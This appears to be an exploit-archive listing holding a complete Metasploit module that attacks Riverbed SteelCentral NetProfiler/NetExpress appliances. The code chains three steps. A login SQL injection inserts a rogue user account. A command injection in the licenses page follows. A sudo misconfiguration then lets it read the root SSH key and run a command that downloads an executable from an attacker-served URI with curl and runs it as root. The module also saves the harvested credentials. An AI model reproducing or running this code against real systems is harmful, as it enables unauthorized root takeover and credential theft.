Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution



EKU-ID: 5690 CVE: OSVDB-ID:
Author: Francesco Oddo Published: 2016-07-12 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  require 'digest'

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution",
      'Description'    => %q{
        This module exploits three separate vulnerabilities found in the Riverbed SteelCentral NetProfiler/NetExpress
        virtual appliances to obtain remote command execution as the root user. A SQL injection in the login form
        can be exploited to add a malicious user into the application's database. An attacker can then exploit a
        command injection vulnerability in the web interface to obtain arbitrary code execution. Finally, an insecure
        configuration of the sudoers file can be abused to escalate privileges to root.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'Francesco Oddo <francesco.oddo[at]security-assessment.com>' ],
      'References'     =>
        [
          [ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Riverbed-SteelCentral-NetProfilerNetExpress-Advisory.pdf' ]
        ],
      'Platform'       => 'linux',
      'Arch'           => ARCH_X86_64,
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'Targets'        =>
        [
          [ 'Riverbed SteelCentral NetProfiler 10.8.7 / Riverbed NetExpress 10.8.7', { }]
        ],
      'DefaultOptions' =>
        {
          'SSL' => true
        },
      'Privileged'     => false,
      'DisclosureDate' => "Jun 27 2016",
      'DefaultTarget'  => 0
      ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The target URI', '/']),
        OptString.new('RIVERBED_USER', [true, 'Web interface user account to add', 'user']),
        OptString.new('RIVERBED_PASSWORD', [true, 'Web interface user password', 'riverbed']),
        OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]),
        Opt::RPORT(443)
      ],
      self.class
    )
  end

  def check
    json_payload_check = "{\"username\":\"check_vulnerable%'; SELECT PG_SLEEP(2)--\", \"password\":\"pwd\"}";

    # Verifies existence of login SQLi
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path,'/api/common/1.0/login'),
      'ctype' => 'application/json',
      'encode_params' => false,
      'data'     => json_payload_check
     })

     if res && res.body && res.body.include?('AUTH_DISABLED_ACCOUNT')
       return Exploit::CheckCode::Vulnerable
     end

     Exploit::CheckCode::Safe
  end

  def exploit

    print_status("Attempting log in to target appliance")
    @sessid = do_login

    print_status("Confirming command injection vulnerability")
    test_cmd_inject
    vprint_status('Ready to execute payload on appliance')

    @elf_sent = false
    # Generate payload
    @pl = generate_payload_exe

    if @pl.nil?
      fail_with(Failure::BadConfig, 'Please select a valid Linux payload')
    end

    # Start the server and use primer to trigger fetching and running of the payload
    begin
      Timeout.timeout(datastore['HTTPDELAY']) { super }
    rescue Timeout::Error
    end

  end

  def get_nonce
    # Function to get nonce from login page

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path,'/index.php'),
     })

    if res && res.body && res.body.include?('nonce_')
       html = res.get_html_document
       nonce_field = html.at('input[@name="nonce"]')
       nonce = nonce_field.attributes["value"]
    else
       fail_with(Failure::Unknown, 'Unable to get login nonce.')
    end

    # needed as login nonce is bounded to preauth SESSID cookie
    sessid_cookie_preauth = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || ''

    return [nonce, sessid_cookie_preauth]

  end

  def do_login

    uname = datastore['RIVERBED_USER']
    passwd = datastore['RIVERBED_PASSWORD']

    nonce, sessid_cookie_preauth = get_nonce
    post_data = "login=1&nonce=#{nonce}&uname=#{uname}&passwd=#{passwd}"

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path,'/index.php'),
      'cookie' => "SESSID=#{sessid_cookie_preauth}",
      'ctype' => 'application/x-www-form-urlencoded',
      'encode_params' => false,
      'data'     => post_data
     })

    # Exploit login SQLi if credentials are not valid.
    if res && res.body && res.body.include?('<form name="login"')
       print_status("Invalid credentials. Creating malicious user through login SQLi")

       create_user
       nonce, sessid_cookie_preauth = get_nonce
       post_data = "login=1&nonce=#{nonce}&uname=#{uname}&passwd=#{passwd}"

       res = send_request_cgi({
         'method' => 'POST',
         'uri' => normalize_uri(target_uri.path,'/index.php'),
         'cookie' => "SESSID=#{sessid_cookie_preauth}",
         'ctype' => 'application/x-www-form-urlencoded',
         'encode_params' => false,
         'data'     => post_data
       })

       sessid_cookie = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || ''
       print_status("Saving login credentials into Metasploit DB")
       report_cred(uname, passwd)
    else
       print_status("Valid login credentials provided. Successfully logged in")
       sessid_cookie = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || ''
       print_status("Saving login credentials into Metasploit DB")
       report_cred(uname, passwd)
    end

    return sessid_cookie

  end

  def report_cred(username, password)
    # Function used to save login credentials into Metasploit database
    service_data = {
      address: rhost,
      port: rport,
      service_name: ssl ? 'https' : 'http',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      module_fullname: self.fullname,
      origin_type: :service,
      username: username,
      private_data: password,
      private_type: :password
    }.merge(service_data)

    credential_core = create_credential(credential_data)

    login_data = {
      core: credential_core,
      last_attempted_at: DateTime.now,
      status: Metasploit::Model::Login::Status::SUCCESSFUL
    }.merge(service_data)

    create_credential_login(login_data)
  end

  def create_user
    # Function exploiting login SQLi to create a malicious user
    username = datastore['RIVERBED_USER']
    password = datastore['RIVERBED_PASSWORD']

    usr_payload = generate_sqli_payload(username)
    pwd_hash = Digest::SHA512.hexdigest(password)
    pass_payload = generate_sqli_payload(pwd_hash)
    uid = rand(999)

    json_payload_sqli = "{\"username\":\"adduser%';INSERT INTO users (username, password, uid) VALUES ((#{usr_payload}), (#{pass_payload}), #{uid});--\", \"password\":\"pwd\"}";

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path,'/api/common/1.0/login'),
      'ctype' => 'application/json',
      'encode_params' => false,
      'data'     => json_payload_sqli
     })

     json_payload_checkuser = "{\"username\":\"#{username}\", \"password\":\"#{password}\"}";

     res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path,'/api/common/1.0/login'),
      'ctype' => 'application/json',
      'encode_params' => false,
      'data'     => json_payload_checkuser
     })

     if res && res.body && res.body.include?('session_id')
       print_status("User account successfully created, login credentials: '#{username}':'#{password}'")
     else
       fail_with(Failure::UnexpectedReply, 'Unable to add user to database')
     end

  end

  def generate_sqli_payload(input)
    # Function to generate sqli payload for user/pass in expected format
    payload = ''
    input_array = input.strip.split('')
    for index in 0..input_array.length-1
      payload = payload << 'CHR(' + input_array[index].ord.to_s << ')||'
    end

    # Gets rid of the trailing '||' and newline
    payload = payload[0..-3]

    return payload
  end

  def test_cmd_inject
    post_data = "xjxfun=get_request_key&xjxr=1457064294787&xjxargs[]=Stoken; id;"

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path,'/index.php?page=licenses'),
      'cookie' => "SESSID=#{@sessid}",
      'ctype' => 'application/x-www-form-urlencoded',
      'encode_params' => false,
      'data'     => post_data
     })

    unless res && res.body.include?('uid=')
      fail_with(Failure::UnexpectedReply, 'Could not inject command, may not be vulnerable')
    end

  end

  def cmd_inject(cmd)

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path,'/index.php?page=licenses'),
      'cookie' => "SESSID=#{@sessid}",
      'ctype' => 'application/x-www-form-urlencoded',
      'encode_params' => false,
      'data'     => cmd
     })

  end

  # Deliver payload to appliance and make it run it
  def primer

    # Gets the autogenerated uri
    payload_uri = get_uri

    root_ssh_key_private = rand_text_alpha_lower(8)
    binary_payload = rand_text_alpha_lower(8)

    print_status("Privilege escalate to root and execute payload")

    privesc_exec_cmd = "xjxfun=get_request_key&xjxr=1457064346182&xjxargs[]=Stoken;  sudo -u mazu /usr/mazu/bin/mazu-run /usr/bin/sudo /bin/date -f /opt/cascade/vault/ssh/root/id_rsa | cut -d ' ' -f 4- | tr -d '`' | tr -d \"'\" > /tmp/#{root_ssh_key_private}; chmod 600 /tmp/#{root_ssh_key_private}; ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -i /tmp/#{root_ssh_key_private} root@localhost '/usr/bin/curl -k #{payload_uri} -o /tmp/#{binary_payload}; chmod 755 /tmp/#{binary_payload}; /tmp/#{binary_payload}'"

    cmd_inject(privesc_exec_cmd)

    register_file_for_cleanup("/tmp/#{root_ssh_key_private}")
    register_file_for_cleanup("/tmp/#{binary_payload}")

    vprint_status('Finished primer hook, raising Timeout::Error manually')
    raise(Timeout::Error)
  end

  #Handle incoming requests from the server
  def on_request_uri(cli, request)
    vprint_status("on_request_uri called: #{request.inspect}")
    print_status('Sending the payload to the server...')
    @elf_sent = true
    send_response(cli, @pl)
  end

end